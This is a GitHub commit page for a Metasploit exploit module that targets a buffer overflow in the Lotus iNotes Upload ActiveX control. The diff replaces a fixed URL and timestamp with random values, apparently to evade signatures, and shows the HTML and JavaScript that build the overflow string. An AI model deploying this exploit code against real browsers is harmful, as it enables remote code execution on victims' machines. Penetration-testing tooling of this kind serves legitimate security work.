Skip to content

Commit 8f62cd5

Browse files
author
jvazquez-r7
committed
swith to some random data
1 parent af61438 commit 8f62cd5

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/browser/inotes_dwa85w_bof.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -254,11 +254,11 @@ def load_exploit_html(my_target, cli)
254254
<body>
255255
<object id="UploadControl" width="100%" height="100%" classid="clsid:0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C">
256256
<param name="General_Mode" value="1">
257-
<param name="General_URL" value="http://localhost/iNotes/Forms85.nsf/0/">
257+
<param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
258258
</object>
259259
<script>
260260
var bof = unescape("#{my_bof}");
261-
var my_time = "7/20/2011 11:01:42 ";
261+
var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
262262
my_time += bof;
263263
my_time += " GMT";
264264
UploadControl.Attachment_Times = my_time;

0 commit comments

Comments
 (0)